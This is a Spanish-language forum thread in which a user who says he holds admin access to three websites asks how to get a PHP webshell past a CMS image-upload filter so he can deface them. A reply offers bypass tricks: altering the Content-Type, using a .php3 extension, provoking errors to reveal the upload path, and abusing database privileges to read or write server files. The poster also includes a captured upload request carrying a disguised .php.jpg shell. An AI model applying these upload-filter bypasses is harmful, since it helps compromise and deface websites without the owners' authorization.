necesito ayuda con un deface, tengo la pass admin pero no puedo subir la shell

Iniciado por ruben_linux, 25 Agosto 2012, 02:22 AM

0 Miembros y 1 Visitante están viendo este tema.

ruben_linux

el caso es que tengo acceso a 3 web como admin, pero cuando trato de subir un .php con la webshell, en lugar de una foto, despues no me aparece la shell.

alguna idea? ya probé a subirla en .php.jpg, .php.gif, .php.png .... en lugar de que otro documento puedo sustituirla??

la parte dificil ya esta, me falta la artistica  ;)

afdlkglfgfdgfhgf

#1
la parte dificil es esta, ya que cualquier persona con CERO conocimientos puede encontrar los datos del administrador en una pagina vulnerable a SQLI.


ahora te toca aprender que es una peticion HTTP y ver si por ahi se puede hacer algo, creo que modificando el ??????????? podria saltar la proteccion, creo que tambien con la extension ???3 en
algunos casos se podria saltar la proteccion.

a todo esto sabes si el script que guarda el archivo , renombra el archivo despues de subir??, intentaste provocar un error, para ver si puedes sacar un discloure del PATH o el nombre del archivo como lo intenta guardar ??, revisaste los privilegios que tiene el usario actual del DBMS que realiza las consultaS ??, probaste leyendo archivos del servidor con consultas ?? , intentaste crear archivos en el servidor con consultas?? ..

falta la parte dificil, la que algun dia puede hacer la diferencia entre tu y el que esta a tu lado, es la parte
de aprender a razonar y entender como funcionan las cosas, y lo mas importante PARA QUE QUIERO COLOCAR UN DEFACE EN UNA PAGINA ?? .

te dejo ??? de tarea para la casa ;) , pero de que te ayude lo hize :p .

ruben_linux

gracias: afdlkglfgfdgfhgf
En la forma de ataque no tienes razón,  no fue un ataque SQLi.

La razón del deface.... no la tiene, simplemente quiero subir una webshell.
En cuanto a las peticiones HTTP uso el TamperData y el LiveHTTPheaders, este ultimo es mi preferido.
Los privilegios son totales, es la cuenta del admin.

Referente a resto podrías darme alguan pista?? :D



afdlkglfgfdgfhgf

content-type
.php3

y deben haber mas, hay que variar, y intenta generar un error, metiendo caracteres raros, y tambien variando el largo de la cadena, para ver si tienes algun tipo de informacion, tambn localiza donde sube los ficheros utilizando algun dork , onda site:porno.com ext:pdf ,.

por cierto pense que habia sido un sqli, y cuando hablaba de privilegios, me referia a los privilegios del DBMS :p .

suerte!!,

ruben_linux

Alguien puede decirme en que fallo?? Me registro como admin, busco en el CMS un img, le subo la webshell como .php.jpg, me dice que esta bien subida, pero despues no aparece donde estaba la img.
Aqui os dejo la captura de LiveHTTPheaders

despues de modificar con LiveHTTPheaders:

Location: categories?type=Edit&rid=63&msg=image is not supported either invalid format or image size!!

no se seguir :-( necesito otro metodo para bypass el updoad
no quería hacer otro post asi que modifico este


/////////////////////////////////////////////
POST /admin/categories?rid=63&type=Edit&play=save&page= HTTP/1.1

Host: www.*********.com

User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.24) Gecko/20111107 Ubuntu/10.10 (maverick) Firefox/3.6.24

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: TIS-620,utf-8;q=0.7,*;q=0.7

Keep-Alive: 115

Connection: keep-alive

Referer: http://www.*********.com/admin/categories?type=Edit&rid=63&page=

Cookie: __atuvc=4%7C34; PHPSESSID=tERtWctZ1TEYNoAqAGN892

Content-Type: multipart/form-data; boundary=---------------------------1966138998259963822131653635

Content-Length: 74857



-----------------------------1966138998259963822131653635

Content-Disposition: form-data; name="categories_name_1"



Cloth Dryers

-----------------------------1966138998259963822131653635

Content-Disposition: form-data; name="meta_keywords_1"



Cloth Dryers

-----------------------------1966138998259963822131653635

Content-Disposition: form-data; name="meta_description_1"



Cloth Dryers

-----------------------------1966138998259963822131653635

Content-Disposition: form-data; name="categories_description_1"



<p>Cloth Dryers</p>

-----------------------------1966138998259963822131653635

Content-Disposition: form-data; name="parent_id"



43

-----------------------------1966138998259963822131653635

Content-Disposition: form-data; name="categories_image"; filename="W5h311Oculta.php.jpg"<----lo cambio a .php (bypass)

Content-Type: image/jpeg
.
.
.
.
.
.
HTTP/1.1 302 Moved Temporarily   <<<-----------------------------  ESTE ES LO QUE NO ME DEJA SUBIR LA SHELL????????????

Date: Sat, 25 Aug 2012 15:36:43 GMT

Server: Apache

Expires: Thu, 19 Nov 1981 08:52:00 GMT

Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0

Pragma: no-cache

Location: /admin/categories?page=&msg=selected categories modified successfully!! <<<------------- ESTO NO CONTRADICE LO ANTERIOR????

Vary: Accept-Encoding

Content-Encoding: gzip

Content-Length: 20

Keep-Alive: timeout=2, max=100

Connection: Keep-Alive

Content-Type: text/html

//////////////////////////////////// aqui esta toda la cadena: http://pastebin.com/LJ6mvpCp

El codigo de estado 302: Similar a 301, excepto que la nueva URL debería ser interpretada como reemplazada temporalmente, no permanentemente.
fuente y mas info: https://tpv.4b.es/tpvv/consultas/doc/Documentos%20Errores/C%C3%B3digos%20de%20Estado%20HTTP%201.htm